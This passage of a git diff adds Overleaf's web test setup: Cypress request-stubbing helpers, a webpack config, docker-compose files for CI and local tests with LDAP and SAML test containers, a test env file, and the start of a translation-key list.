'foo', + compileGroup: 'priority', + pdfDownloadDomain: 'https://clsi.test-overleaf.com', + outputFiles: outputFiles(), + options: { + rootResourcePath: 'main.tex', + imageName: 'texlive-full:2024.1', + compiler: 'pdflatex', + stopOnFirstError: false, + draft: false, + }, + } +} + +export const interceptCompileFromCacheRequest = ({ + times, + promise, +}: { + times: number + promise: Promise<unknown> +}) => { + return cy.intercept( + { path: '/project/*/output/cached/output.overleaf.json', times }, + async req => { + await promise + req.reply({ body: compileFromCacheResponse() }) + } + ) +} + +export const interceptCompileRequest = ({ times = 1 } = {}) => { + return cy.intercept( + { method: 'POST', pathname: '/project/*/compile', times }, + { + body: { + status: 'success', + clsiServerId: 'foo', + compileGroup: 'priority', + pdfDownloadDomain: 'https://clsi.test-overleaf.com', + outputFiles: outputFiles(), + }, + } + ) +} + +export const interceptCompile = ({ + prefix = 'compile', + times = 1, + cached = false, + regular = true, + outputPDFFixture = 'output.pdf', +} = {}) => { + if (cached) { + cy.intercept( + { path: '/project/*/output/cached/output.overleaf.json', times }, + { body: compileFromCacheResponse() } + ).as(`${prefix}-cached`) + } else { + cy.intercept( + { pathname: '/project/*/output/cached/output.overleaf.json', times }, + { statusCode: 404 } + ).as(`${prefix}-cached`) + } + + if (regular) { + interceptCompileRequest({ times }).as(`${prefix}`) + } else { + cy.intercept( + { method: 'POST', pathname: '/project/*/compile', times }, + { + body: { + status: 'unavailable', + clsiServerId: 'foo', + compileGroup: 'priority', + pdfDownloadDomain: 'https://clsi.test-overleaf.com', + outputFiles: [], + }, + } + ).as(`${prefix}`) + } + + cy.intercept( + { pathname: '/build/*/output.pdf', times }, + { fixture: `build/${outputPDFFixture},null` } + ).as(`${prefix}-pdf`) + + cy.intercept( + { pathname: '/build/*/output.log', times }, + { fixture: 'build/output.log' } + ).as(`${prefix}-log`) + + cy.intercept( + { pathname: '/build/*/output.blg', times }, + { fixture: 'build/output.blg' } + ).as(`${prefix}-blg`) +} + +export const waitForCompile = ({ + prefix = 'compile', + pdf = false, + cached = false, + regular = true, +} = {}) => { + if (cached) { + cy.wait(`@${prefix}-cached`) + } + if (regular) { + cy.wait(`@${prefix}`) + } + return waitForCompileOutput({ prefix, pdf, cached }) +} + +export const waitForCompileOutput = ({ + prefix = 'compile', + pdf = false, + cached = false, +} = {}) => { + cy.wait(`@${prefix}-log`) + .its('request.query.clsiserverid') + .should('eq', cached ? 'cache' : 'foo') // straight from cache if cached + cy.wait(`@${prefix}-blg`) + .its('request.query.clsiserverid') + .should('eq', cached ? 
'cache' : 'foo') // straight from cache if cached + if (pdf) { + cy.wait(`@${prefix}-pdf`) + .its('request.query.clsiserverid') + .should('eq', 'foo') // always from VM first + } + return cy.wrap(null) +} + +export const interceptDeferredCompile = (beforeResponse?: () => void) => { + const { promise, resolve } = Promise.withResolvers<void>() + + cy.intercept( + { method: 'POST', url: '/project/*/compile*', times: 1 }, + req => { + if (beforeResponse) { + beforeResponse() + } + + // only reply once the Promise is resolved + promise.then(() => { + req.reply({ + body: { + status: 'success', + clsiServerId: 'foo', + compileGroup: 'priority', + pdfDownloadDomain: 'https://clsi.test-overleaf.com', + outputFiles: [ + { + path: 'output.pdf', + build: '123', + url: '/build/123/output.pdf', + type: 'pdf', + }, + { + path: 'output.log', + build: '123', + url: '/build/123/output.log', + type: 'log', + }, + { + path: 'output.blg', + build: '123', + url: '/build/123/output.blg', + type: 'log', + }, + ], + }, + }) + }) + + return promise + } + ).as('compile') + + cy.intercept( + { pathname: '/build/*/output.pdf', times: 1 }, + { fixture: 'build/output.pdf,null' } + ).as(`compile-pdf`) + + cy.intercept( + { pathname: '/build/*/output.log', times: 1 }, + { fixture: 'build/output.log' } + ).as(`compile-log`) + + cy.intercept( + { pathname: '/build/*/output.blg', times: 1 }, + { fixture: 'build/output.blg' } + ).as(`compile-blg`) + + return cy.wrap(resolve) +} diff --git a/services/web/cypress/support/shared/commands/events.ts b/services/web/cypress/support/shared/commands/events.ts new file mode 100644 index 0000000..26a6375 --- /dev/null +++ b/services/web/cypress/support/shared/commands/events.ts @@ -0,0 +1,5 @@ +export const interceptEvents = () => { + cy.intercept('POST', '/event/*', { + statusCode: 204, + }).as('createEvent') +} diff --git a/services/web/cypress/support/shared/commands/index.ts b/services/web/cypress/support/shared/commands/index.ts new file mode 100644 index 0000000..bb55fdd --- /dev/null +++ b/services/web/cypress/support/shared/commands/index.ts @@ -0,0 +1,56 @@ +import '@testing-library/cypress/add-commands' +import { + interceptCompile, + interceptCompileFromCacheRequest, + waitForCompile, + interceptDeferredCompile, + interceptCompileRequest, +} from './compile' +import { interceptEvents } from './events' +import { interceptAsync } from './intercept-async' +import { interceptFileUpload } from './upload' +import { interceptProjectListing } from './project-list' +import { interceptLinkedFile } from './linked-file' +import { interceptMathJax } from './mathjax' +import { interceptMetadata } from './metadata' +import { interceptTutorials } from './tutorials' + +// eslint-disable-next-line no-unused-vars,@typescript-eslint/no-namespace +declare global { + // eslint-disable-next-line @typescript-eslint/no-namespace,no-unused-vars + namespace Cypress { + // eslint-disable-next-line no-unused-vars + interface Chainable { + interceptAsync: typeof interceptAsync + interceptCompile: typeof interceptCompile + interceptCompileRequest: typeof interceptCompileRequest + interceptCompileFromCacheRequest: typeof interceptCompileFromCacheRequest + interceptEvents: typeof interceptEvents + interceptMetadata: typeof interceptMetadata + waitForCompile: typeof waitForCompile + interceptDeferredCompile: typeof interceptDeferredCompile + interceptFileUpload: typeof interceptFileUpload + interceptProjectListing: typeof interceptProjectListing + interceptLinkedFile: typeof interceptLinkedFile + interceptMathJax: 
typeof interceptMathJax + interceptTutorials: typeof interceptTutorials + } + } +} + +Cypress.Commands.add('interceptAsync', interceptAsync) +Cypress.Commands.add('interceptCompile', interceptCompile) +Cypress.Commands.add('interceptCompileRequest', interceptCompileRequest) +Cypress.Commands.add( + 'interceptCompileFromCacheRequest', + interceptCompileFromCacheRequest +) +Cypress.Commands.add('interceptEvents', interceptEvents) +Cypress.Commands.add('interceptMetadata', interceptMetadata) +Cypress.Commands.add('waitForCompile', waitForCompile) +Cypress.Commands.add('interceptDeferredCompile', interceptDeferredCompile) +Cypress.Commands.add('interceptFileUpload', interceptFileUpload) +Cypress.Commands.add('interceptProjectListing', interceptProjectListing) +Cypress.Commands.add('interceptLinkedFile', interceptLinkedFile) +Cypress.Commands.add('interceptMathJax', interceptMathJax) +Cypress.Commands.add('interceptTutorials', interceptTutorials) diff --git a/services/web/cypress/support/shared/commands/intercept-async.ts b/services/web/cypress/support/shared/commands/intercept-async.ts new file mode 100644 index 0000000..e11d10e --- /dev/null +++ b/services/web/cypress/support/shared/commands/intercept-async.ts @@ -0,0 +1,19 @@ +import { RouteHandler, RouteMatcher } from 'cypress/types/net-stubbing' + +export const interceptAsync = (route: RouteMatcher, alias: string) => { + const deferred: { resolve: (value: RouteHandler) => void } = { + resolve: () => { + console.error('This should never be called') + }, + } + + const promise = new Promise<RouteHandler>(resolve => { + deferred.resolve = resolve + }) + + cy.intercept(route, req => { + return promise.then(response => req.reply(response)) + }).as(alias) + + return cy.wrap(deferred) +} diff --git a/services/web/cypress/support/shared/commands/linked-file.ts b/services/web/cypress/support/shared/commands/linked-file.ts new file mode 100644 index 0000000..b3e1777 --- /dev/null +++ b/services/web/cypress/support/shared/commands/linked-file.ts @@ -0,0 +1,12 @@ +import { HttpRequestInterceptor } from 'cypress/types/net-stubbing' + +export const interceptLinkedFile = () => { + cy.intercept( + { method: 'POST', url: '/project/*/linked_file' }, + cy + .spy((req: Parameters<HttpRequestInterceptor>[0]) => { + req.reply({ statusCode: 200, body: { success: true } }) + }) + .as('linked-file-request') + ) +} diff --git a/services/web/cypress/support/shared/commands/mathjax.ts b/services/web/cypress/support/shared/commands/mathjax.ts new file mode 100644 index 0000000..ed4cb02 --- /dev/null +++ b/services/web/cypress/support/shared/commands/mathjax.ts @@ -0,0 +1,32 @@ +const MATHJAX_STUB = ` +window.MathJax = { + startup: { + promise: Promise.resolve() + }, + svgStylesheet: () => document.createElement("STYLE"), + typesetPromise: (elements) => { + for (const element of elements) { + // This will keep math delimiters around the text + element.classList.add('MathJax') + } + return Promise.resolve() + }, + tex2svgPromise: (content) => { + const text = document.createElement('SPAN') + text.classList.add('MathJax') + text.innerText = content + return Promise.resolve(text) + }, + getMetricsFor: () => ({}), + texReset: () => {}, +} +` + +export const interceptMathJax = () => { + // NOTE: this is just a URL to be intercepted with the stub, not the real (versioned) MathJax URL + const url = '/js/libs/mathjax/es5/tex-svg-full.js' + cy.window().then(win => { + win.metaAttributesCache.set('ol-mathJaxPath', url) + }) + cy.intercept('GET', url, MATHJAX_STUB).as('mathjax-load-request') +} diff --git 
a/services/web/cypress/support/shared/commands/metadata.ts b/services/web/cypress/support/shared/commands/metadata.ts new file mode 100644 index 0000000..7548c40 --- /dev/null +++ b/services/web/cypress/support/shared/commands/metadata.ts @@ -0,0 +1,3 @@ +export const interceptMetadata = () => { + cy.intercept('POST', '/project/*/doc/*/metadata', {}) +} diff --git a/services/web/cypress/support/shared/commands/project-list.ts b/services/web/cypress/support/shared/commands/project-list.ts new file mode 100644 index 0000000..ea98947 --- /dev/null +++ b/services/web/cypress/support/shared/commands/project-list.ts @@ -0,0 +1,22 @@ +export const interceptProjectListing = () => { + cy.intercept('GET', '/user/projects', { + projects: [ + { + _id: 'fake-project-1', + accessLevel: 'owner', + name: 'My first project', + }, + { + _id: 'fake-project-2', + accessLevel: 'owner', + name: 'My second project', + }, + ], + }) + cy.intercept('GET', '/project/*/entities', { + entities: [ + { path: '/frog.jpg', type: 'file' }, + { path: 'figures/unicorn.png', type: 'file' }, + ], + }) +} diff --git a/services/web/cypress/support/shared/commands/tutorials.ts b/services/web/cypress/support/shared/commands/tutorials.ts new file mode 100644 index 0000000..900db6e --- /dev/null +++ b/services/web/cypress/support/shared/commands/tutorials.ts @@ -0,0 +1,5 @@ +export const interceptTutorials = () => { + cy.intercept('POST', '/tutorial/**', { + statusCode: 204, + }).as('completeTutorial') +} diff --git a/services/web/cypress/support/shared/commands/upload.ts b/services/web/cypress/support/shared/commands/upload.ts new file mode 100644 index 0000000..b03e566 --- /dev/null +++ b/services/web/cypress/support/shared/commands/upload.ts @@ -0,0 +1,19 @@ +import { HttpRequestInterceptor } from 'cypress/types/net-stubbing' + +export const interceptFileUpload = () => { + cy.intercept( + { method: 'POST', url: /\/project\/.*\/upload/ }, + cy + .spy((req: Parameters<HttpRequestInterceptor>[0]) => { + const folderMatch = req.url.match( + /project\/.*\/upload\?folder_id=[a-f0-9]{24}/ + ) + if (!folderMatch) { + req.reply({ statusCode: 500, body: { success: false } }) + return + } + req.reply({ statusCode: 200, body: { success: true } }) + }) + .as('uploadRequest') + ) +} diff --git a/services/web/cypress/support/shared/exceptions.ts b/services/web/cypress/support/shared/exceptions.ts new file mode 100644 index 0000000..4eef572 --- /dev/null +++ b/services/web/cypress/support/shared/exceptions.ts @@ -0,0 +1,6 @@ +Cypress.on('uncaught:exception', err => { + // don't fail the test for ResizeObserver error messages + if (err.message.includes('ResizeObserver')) { + return false + } +}) diff --git a/services/web/cypress/support/webpack.cypress.ts b/services/web/cypress/support/webpack.cypress.ts new file mode 100644 index 0000000..eb8884c --- /dev/null +++ b/services/web/cypress/support/webpack.cypress.ts @@ -0,0 +1,53 @@ +import { merge } from 'webpack-merge' +import path from 'path' +import webpack from 'webpack' +import HtmlWebpackPlugin from 'html-webpack-plugin' +import devConfig from '../../webpack.config.dev' + +const buildConfig = () => { + const webpackConfig = merge(devConfig, { + output: { + workerPublicPath: '/__cypress/src/', + }, + devServer: { + static: path.join(__dirname, '../../public'), + port: 3200, + }, + stats: 'none', + plugins: [ + new webpack.EnvironmentPlugin({ + CYPRESS: true, + }), + new HtmlWebpackPlugin({ + template: path.resolve('./component-index.html'), + }), + ], + } as any) + + delete webpackConfig.devServer.client + + 
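// NOTE (editor's comment, an assumption about intent): the merged entrypoints are reset because Cypress injects the component specs itself; only the standalone web-worker bundles registered below need their own webpack entries so they resolve under the dev-server root. +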
webpackConfig.entry = {} + const addWorker = (name: string, importPath: string) => { + webpackConfig.entry[name] = require.resolve(importPath) + } + + // add entrypoint under '/' for latex-linter worker + addWorker( + 'latex-linter-worker', + '../../frontend/js/features/source-editor/languages/latex/linter/latex-linter.worker' + ) + + // add entrypoint under '/' for hunspell worker + addWorker( + 'hunspell-worker', + '../../frontend/js/features/source-editor/hunspell/hunspell.worker' + ) + + // add entrypoints under '/' for pdfjs workers + addWorker('pdfjs-dist', 'pdfjs-dist/build/pdf.worker.mjs') + + return webpackConfig +} + +export const webpackConfig = buildConfig() diff --git a/services/web/data/.gitignore b/services/web/data/.gitignore new file mode 100644 index 0000000..0fa27a1 --- /dev/null +++ b/services/web/data/.gitignore @@ -0,0 +1,4 @@ +# Ignore everything in this directory +* +# Except this file +!.gitignore diff --git a/services/web/docker-compose.ci.yml b/services/web/docker-compose.ci.yml new file mode 100644 index 0000000..c277cc0 --- /dev/null +++ b/services/web/docker-compose.ci.yml @@ -0,0 +1,124 @@ +version: "2.3" + +volumes: + data: + +services: + + test_unit: + build: + context: ../.. + dockerfile: services/web/Dockerfile + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + logging: + driver: local + user: node + command: npm run test:unit:app + working_dir: /overleaf/services/web + env_file: docker-compose.common.env + environment: + BASE_CONFIG: + OVERLEAF_CONFIG: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + depends_on: + - mongo + + test_acceptance: + build: + context: ../.. + dockerfile: services/web/Dockerfile + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + logging: + driver: local + working_dir: /overleaf/services/web + env_file: docker-compose.common.env + environment: + BASE_CONFIG: + OVERLEAF_CONFIG: + extra_hosts: + - 'www.overleaf.test:127.0.0.1' + command: npm run test:acceptance:app + user: root + depends_on: + - redis + - mongo + - saml + - ldap + tmpfs: + - /overleaf/services/web/data + + test_frontend: + build: + context: ../.. + dockerfile: services/web/Dockerfile + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + logging: + driver: local + user: node + working_dir: /overleaf/services/web + command: npm run test:frontend + environment: + NODE_OPTIONS: "--unhandled-rejections=strict" + + test_frontend_ct: + image: cypress/included:13.13.2 + logging: + driver: local + working_dir: /overleaf/services/web + environment: + CYPRESS_SPEC_PATTERN: ${CYPRESS_SPEC_PATTERN:-} + CYPRESS_EXCLUDE_SPEC_PATTERN: ${CYPRESS_EXCLUDE_SPEC_PATTERN:-} + volumes: + - ${CYPRESS_RESULTS:-./cypress/results}:/overleaf/services/web/cypress/results/ + - /dev/shm/overleaf:/overleaf + entrypoint: npm + command: + - "run" + - "cypress:run-ct" + + tar: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER-webpack + volumes: + - ./:/tmp/build/ + command: tar -cf /tmp/build/build.tar public/ + user: root + + redis: + image: redis + + mongo: + image: mongo:6.0.13 + logging: + driver: none + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. 
+ - mongo:127.0.0.1 + + ldap: + image: rroemhild/test-openldap:1.1 + logging: + driver: none + # Workaround large memory allocation (using the max-open-files-limit as socket buffer scale). + # REF: https://github.com/moby/moby/issues/8231#issuecomment-63877553 + # REF: https://github.com/moby/moby/issues/8231#issuecomment-63871343 + command: + - 'bash' + - '-c' + - 'ulimit -n 1024 && exec bash /run.sh' + + saml: + image: us-east1-docker.pkg.dev/overleaf-ops/ol-docker/saml-test + logging: + driver: none + environment: + SAML_BASE_URL_PATH: 'http://saml/simplesaml/' + SAML_TEST_SP_ENTITY_ID: 'overleaf-test-saml' + SAML_TEST_SP_LOCATION: 'http://www.overleaf.test:23000/saml/callback' diff --git a/services/web/docker-compose.common.env b/services/web/docker-compose.common.env new file mode 100644 index 0000000..7f94f57 --- /dev/null +++ b/services/web/docker-compose.common.env @@ -0,0 +1,46 @@ +ADMIN_PRIVILEGE_AVAILABLE=true +BCRYPT_ROUNDS=1 +WEB_PORT=23000 +REDIS_HOST=redis +QUEUES_REDIS_HOST=redis +ANALYTICS_QUEUES_REDIS_HOST=redis +MONGO_URL=mongodb://mongo/test-overleaf +OVERLEAF_ALLOW_PUBLIC_ACCESS=true +LINKED_URL_PROXY=http://127.0.0.1:6543 +ENABLED_LINKED_FILE_TYPES=url,project_file,project_output_file,mendeley,zotero +NODE_ENV=test +NODE_OPTIONS=--unhandled-rejections=strict +LOCK_MANAGER_MAX_LOCK_WAIT_TIME=30000 +COOKIE_DOMAIN=.overleaf.test +ADMIN_URL=http://admin.overleaf.test +PUBLIC_URL=http://www.overleaf.test:23000 +HTTP_TEST_HOST=www.overleaf.test +OT_JWT_AUTH_KEY="very secret key" +EXTERNAL_AUTH=none +RECAPTCHA_ENDPOINT=http://127.0.0.1:2222/recaptcha/api/siteverify +# Server-Pro LDAP +OVERLEAF_LDAP_URL=ldap://ldap:389 +OVERLEAF_LDAP_SEARCH_BASE=ou=people,dc=planetexpress,dc=com +OVERLEAF_LDAP_SEARCH_FILTER="(uid={{username}})" +OVERLEAF_LDAP_BIND_DN=cn=admin,dc=planetexpress,dc=com +OVERLEAF_LDAP_BIND_CREDENTIALS=GoodNewsEveryone +OVERLEAF_LDAP_EMAIL_ATT=mail +OVERLEAF_LDAP_NAME_ATT=cn +OVERLEAF_LDAP_LAST_NAME_ATT=sn +OVERLEAF_LDAP_UPDATE_USER_DETAILS_ON_LOGIN=true +# Server-Pro SAML +OVERLEAF_SAML_ENTRYPOINT=http://saml/simplesaml/saml2/idp/SSOService.php +OVERLEAF_SAML_CALLBACK_URL=http://saml/saml/callback +OVERLEAF_SAML_ISSUER=overleaf-test-saml +OVERLEAF_SAML_IDENTITY_SERVICE_NAME="SAML Test Server" +OVERLEAF_SAML_EMAIL_FIELD=email +OVERLEAF_SAML_FIRST_NAME_FIELD=givenName +OVERLEAF_SAML_LAST_NAME_FIELD=sn +OVERLEAF_SAML_UPDATE_USER_DETAILS_ON_LOGIN=true +# simplesaml cert from https://github.com/overleaf/google-ops/tree/master/docker-images/saml-test/var-simplesamlphp/cert 
+OVERLEAF_SAML_CERT=MIIDXTCCAkWgAwIBAgIJAOvOeQ4xFTzsMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNVBAYTAkdCMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTYxMTE1MTQxMjU5WhcNMjYxMTE1MTQxMjU5WjBFMQswCQYDVQQGEwJHQjETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxCT6MBe5G9VoLU8MfztOEbUhnwLp17ak8eFUqxqeXkkqtWB0b/cmIBU3xoQoO3dIF8PBzfqehqfYVhrNt/TFgcmDfmJnPJRL1RJWMW3VmiP5odJ3LwlkKbZpkeT3wZ8HEJIR1+zbpxiBNkbd2GbdR1iumcsHzMYX1A2CBj+ZMV5VijC+K4P0e9c05VsDEUtLmfeAasJAiumQoVVgAe/BpiXjICGGewa6EPFI7mKkifIRKOGxdRESwZZjxP30bI31oDN0cgKqIgSJtJ9nfCn9jgBMBkQHu42WMuaWD4jrGd7+vYdX+oIfArs9aKgAH5kUGhGdew2R9SpBefrhbNxG8QIDAQABo1AwTjAdBgNVHQ4EFgQU+aSojSyyLChP/IpZcafvSdhj7KkwHwYDVR0jBBgwFoAU+aSojSyyLChP/IpZcafvSdhj7KkwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEABl3+OOVLBWMKs6PjA8lPuloWDNzSr3v76oUcHqAb+cfbucjXrOVsS9RJ0X9yxvCQyfM9FfY43DbspnN3izYhdvbJD8kKLNf0LA5st+ZxLfy0ACyL2iyAwICaqndqxAjQYplFAHmpUiu1DiHckyBPekokDJd+ze95urHMOsaGS5RWPoKJVE0bkaAeZCmEu0NNpXRSBiuxXSTeSAJfv6kyE/rkdhzUKyUl/cGQFrsVYfAFQVA+W6CKOh74ErSEzSHQQYndl7nD33snD/YqdU1ROxV6aJzLKCg+sdj+wRXSP2u/UHnM4jW9TGJfhO42jzL6WVuEvr9q4l7zWzUQKKKhtQ== +# DEVICE_HISTORY_SECRET has been generated using: +# NOTE: crypto.generateKeySync was added in v15, v16 is the next LTS release. +# $ docker run --rm node:20.18.2 --print 'require("crypto").generateKeySync("aes", { length: 256 }).export().toString("hex")' +DEVICE_HISTORY_SECRET=1b46e6cdf72db02845da06c9517c9cfbbfa0d87357479f4e1df3ce160bd54807 +QUEUE_PROCESSING_ENABLED=true diff --git a/services/web/docker-compose.cypress.yml b/services/web/docker-compose.cypress.yml new file mode 100644 index 0000000..5c0cb95 --- /dev/null +++ b/services/web/docker-compose.cypress.yml @@ -0,0 +1,14 @@ +services: + cypress: + image: cypress/included:13.13.2 + volumes: + - ../../:/overleaf + - /tmp/.X11-unix:/tmp/.X11-unix + working_dir: /overleaf/services/web + entrypoint: npm + command: run cypress:open-ct + user: "${DOCKER_USER:-1000:1000}" + environment: + VERBOSE_LOGGING: + DISPLAY: ${DISPLAY:-:0} +# DEBUG: cypress.* diff --git a/services/web/docker-compose.yml b/services/web/docker-compose.yml new file mode 100644 index 0000000..c6a5aa7 --- /dev/null +++ b/services/web/docker-compose.yml @@ -0,0 +1,117 @@ +version: "2.3" + +volumes: + data: + +services: + + test_unit: + image: node:20.18.2 + volumes: + - .:/overleaf/services/web + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/web + env_file: docker-compose.common.env + environment: + BASE_CONFIG: + OVERLEAF_CONFIG: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit:app + user: node + depends_on: + - mongo + + test_acceptance: + image: node:20.18.2 + volumes: + - .:/overleaf/services/web + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + user: node + working_dir: /overleaf/services/web + env_file: docker-compose.common.env + environment: + BASE_CONFIG: + OVERLEAF_CONFIG: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + MONGO_SERVER_SELECTION_TIMEOUT: 600000 + MONGO_SOCKET_TIMEOUT: 300000 + # OVERLEAF_ALLOW_ANONYMOUS_READ_AND_WRITE_SHARING: 'true' + + extra_hosts: + - 'www.overleaf.test:127.0.0.1' + depends_on: + - redis + - mongo + - saml + - ldap + command: npm run --silent test:acceptance:app + + test_frontend: + build: + context: ../.. 
+ dockerfile: services/web/Dockerfile + target: base + volumes: + - .:/overleaf/services/web + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/web + environment: + MOCHA_GREP: ${MOCHA_GREP} + NODE_OPTIONS: "--unhandled-rejections=strict" + VERBOSE_LOGGING: + command: npm run --silent test:frontend + user: node + + test_frontend_ct: + image: cypress/included:13.13.2 + volumes: + - ../../:/overleaf + working_dir: /overleaf/services/web + environment: + VERBOSE_LOGGING: + CYPRESS_SPEC_PATTERN: ${CYPRESS_SPEC_PATTERN:-} + CYPRESS_EXCLUDE_SPEC_PATTERN: ${CYPRESS_EXCLUDE_SPEC_PATTERN:-} + entrypoint: npm + command: + - "run" + - "cypress:run-ct" + + redis: + image: redis + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 + + ldap: + image: rroemhild/test-openldap:1.1 + # Workaround large memory allocation (using the max-open-files-limit as socket buffer scale). + # REF: https://github.com/moby/moby/issues/8231#issuecomment-63877553 + # REF: https://github.com/moby/moby/issues/8231#issuecomment-63871343 + command: + - 'bash' + - '-c' + - 'ulimit -n 1024 && exec bash /run.sh' + + saml: + image: us-east1-docker.pkg.dev/overleaf-ops/ol-docker/saml-test + environment: + SAML_BASE_URL_PATH: 'http://saml/simplesaml/' + SAML_TEST_SP_ENTITY_ID: 'overleaf-test-saml' + SAML_TEST_SP_LOCATION: 'http://www.overleaf.test:23000/saml/callback' diff --git a/services/web/frontend/extracted-translations.json b/services/web/frontend/extracted-translations.json new file mode 100644 index 0000000..c11e77c --- /dev/null +++ b/services/web/frontend/extracted-translations.json @@ -0,0 +1,2176 @@ +{ + "12x_more_compile_time": "", + "1_2_width": "", + "1_4_width": "", + "3_4_width": "", + "About": "", + "Account": "", + "Account Settings": "", + "Documentation": "", + "Get Involved": "", + "Help": "", + "Learn": "", + "Plans and Pricing": "", + "a_custom_size_has_been_used_in_the_latex_code": "", + "a_fatal_compile_error_that_completely_blocks_compilation": "", + "a_file_with_that_name_already_exists_and_will_be_overriden": "", + "a_more_comprehensive_list_of_keyboard_shortcuts": "", + "a_new_reference_was_added": "", + "a_new_reference_was_added_from_provider": "", + "a_new_reference_was_added_to_file": "", + "a_new_reference_was_added_to_file_from_provider": "", + "about_error_assist": "", + "about_to_archive_projects": "", + "about_to_delete_cert": "", + "about_to_delete_projects": "", + "about_to_delete_tag": "", + "about_to_delete_the_following_project": "", + "about_to_delete_the_following_projects": "", + "about_to_delete_user_preamble": "", + "about_to_enable_managed_users": "", + "about_to_leave_project": "", + "about_to_leave_projects": "", + "about_to_trash_projects": "", + "about_writefull": "", + "accept_and_continue": "", + "accept_change": "", + "accept_change_error_description": "", + "accept_change_error_title": "", + "accept_invitation": "", + "accept_or_reject_each_changes_individually": "", + "accept_or_reject_individual_edits": "", + "accept_selected_changes": "", + "accept_terms_and_conditions": "", + "accepted_invite": "", + 
"access_all_premium_features": "", + "access_denied": "", + "access_edit_your_projects": "", + "access_levels_changed": "", + "access_your_favourite_features_faster_with_our_new_streamlined_editor": "", + "account_billed_manually": "", + "account_has_been_link_to_institution_account": "", + "account_has_past_due_invoice_change_plan_warning": "", + "account_managed_by_group_administrator": "", + "account_not_linked_to_dropbox": "", + "account_settings": "", + "acct_linked_to_institution_acct_2": "", + "actions": "", + "active": "", + "add": "", + "add_a_recovery_email_address": "", + "add_add_on_to_your_plan": "", + "add_additional_certificate": "", + "add_affiliation": "", + "add_ai_assist": "", + "add_another_address_line": "", + "add_another_email": "", + "add_another_token": "", + "add_comma_separated_emails_help": "", + "add_comment": "", + "add_comment_error_message": "", + "add_comment_error_title": "", + "add_company_details": "", + "add_email_address": "", + "add_email_to_claim_features": "", + "add_error_assist_annual_to_your_projects": "", + "add_error_assist_to_your_projects": "", + "add_files": "", + "add_more_collaborators": "", + "add_more_licenses_to_my_plan": "", + "add_more_managers": "", + "add_new_email": "", + "add_on": "", + "add_ons": "", + "add_or_remove_project_from_tag": "", + "add_overleaf_assist_to_your_group_subscription": "", + "add_overleaf_assist_to_your_institution": "", + "add_people": "", + "add_role_and_department": "", + "add_to_dictionary": "", + "add_to_tag": "", + "add_unlimited_ai_to_your_overleaf_plan": "", + "add_your_comment_here": "", + "add_your_first_group_member_now": "", + "added_by_on": "", + "adding": "", + "additional_certificate": "", + "additional_licenses": "", + "address_line_1": "", + "address_second_line_optional": "", + "adjust_column_width": "", + "advanced_reference_search_mode": "", + "after_that_well_bill_you_x_total_y_subtotal_z_tax_annually_on_date_unless_you_cancel": "", + "aggregate_changed": "", + "aggregate_to": "", + "agree_with_the_terms": "", + "ai_assist_in_overleaf_is_included_via_writefull": "", + "ai_assistance_to_help_you": "", + "ai_based_language_tools": "", + "ai_can_make_mistakes": "", + "ai_features": "", + "ai_feedback_please_provide_more_detail": "", + "ai_feedback_tell_us_what_was_wrong_so_we_can_improve": "", + "ai_feedback_the_answer_was_too_long": "", + "ai_feedback_the_answer_wasnt_detailed_enough": "", + "ai_feedback_the_suggestion_didnt_fix_the_error": "", + "ai_feedback_the_suggestion_wasnt_the_best_fix_available": "", + "ai_feedback_there_was_no_code_fix_suggested": "", + "alignment": "", + "all_borders": "", + "all_features_in_group_standard_plus": "", + "all_premium_features": "", + "all_premium_features_including": "", + "all_projects": "", + "all_projects_will_be_transferred_immediately": "", + "all_these_experiments_are_available_exclusively": "", + "allows_to_search_by_author_title_etc_possible_to_pull_results_directly_from_your_reference_manager_if_connected": "", + "already_have_a_papers_account": "", + "already_subscribed_try_refreshing_the_page": "", + "an_email_has_already_been_sent_to": "", + "an_error_occured_while_restoring_project": "", + "an_error_occurred_when_verifying_the_coupon_code": "", + "annual_discount": "", + "anonymous": "", + "anyone_with_link_can_edit": "", + "anyone_with_link_can_view": "", + "app_on_x": "", + "appearance": "", + "apply_educational_discount_description_with_group_discount": "", + "apply_suggestion": "", + "archive": "", + "archive_projects": "", + 
